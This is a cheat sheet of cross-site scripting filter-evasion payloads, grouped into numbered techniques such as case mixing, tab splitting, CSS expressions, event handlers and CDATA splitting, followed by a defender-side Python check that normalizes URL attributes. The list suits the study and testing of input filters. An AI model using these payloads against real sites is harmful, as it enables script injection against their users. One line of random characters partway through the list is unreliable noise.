1. Change the case of characters

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use a different extension instead of .js

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab

-> newline
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" can also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
2 A) C9 D( f9 x* ]. j2 C# x2 j/ N% R1 N6 N4 v. Y; n
9. Script in HTML tag event-handler attributes

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside a SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
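A defender-side check, added here as an example and not part of the original post: it shows why a literal match on javascript: misses the case-changed (item 1), tab/newline (item 6) and entity-encoded (item 8) variants in URL attributes like those in item 14, and how normalizing the attribute value first (entity decoding, stripping ASCII control characters, case folding) catches them. The markup samples are constructed from this page's patterns; a server-side scheme allowlist is the stronger fix, and this block only demonstrates the normalization step.

```python
import html
import re

# Constructed samples modelled on the evasions in items 1, 6, 8 and 14 of this page.
SAMPLES = {
    "case":     '<img src="JaVaScRiPt:alert(1)">',
    "tab":      '<img src="jav\tascr\nipt:alert(1)">',
    "entities": '<img src="&#106;&#97;&#118;&#97;script&#58;alert(1)">',
    "lowsrc":   '<IMG LOWSRC="javascript:alert(1)">',
    "benign":   '<img src="https://example.test/logo.png">',
}

# What a weak blacklist does: a literal, case-sensitive match on the raw markup.
NAIVE = re.compile(r"javascript:")

def naive_filter_blocks(markup: str) -> bool:
    return bool(NAIVE.search(markup))

# URL-bearing attributes named on this page; the value may be "..", '..' or unquoted.
URL_ATTR = re.compile(
    r"\b(?:src|href|dynsrc|lowsrc|background)\s*=\s*"
    r"(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)

def normalize_url(value: str) -> str:
    """Undo the three evasions: decode HTML entities, drop ASCII control and
    space characters (browsers ignore tab/newline inside a scheme), case-fold."""
    decoded = html.unescape(value)
    stripped = re.sub(r"[\x00-\x20\x7f]", "", decoded)
    return stripped.casefold()

def has_script_url(markup: str) -> bool:
    """True if any URL attribute, after normalization, uses the javascript: scheme."""
    for m in URL_ATTR.finditer(markup):
        raw = m.group(1) or m.group(2) or m.group(3) or ""
        scheme = normalize_url(raw).partition(":")[0]
        if scheme == "javascript":
            return True
    return False

if __name__ == "__main__":
    for name, markup in SAMPLES.items():
        print(f"{name:9} naive={naive_filter_blocks(markup)!s:5} "
              f"normalized={has_script_url(markup)}")
```

Running the block prints, for each sample, whether the literal match and the normalized check flag it; only the normalized check flags the case, tab and entity variants.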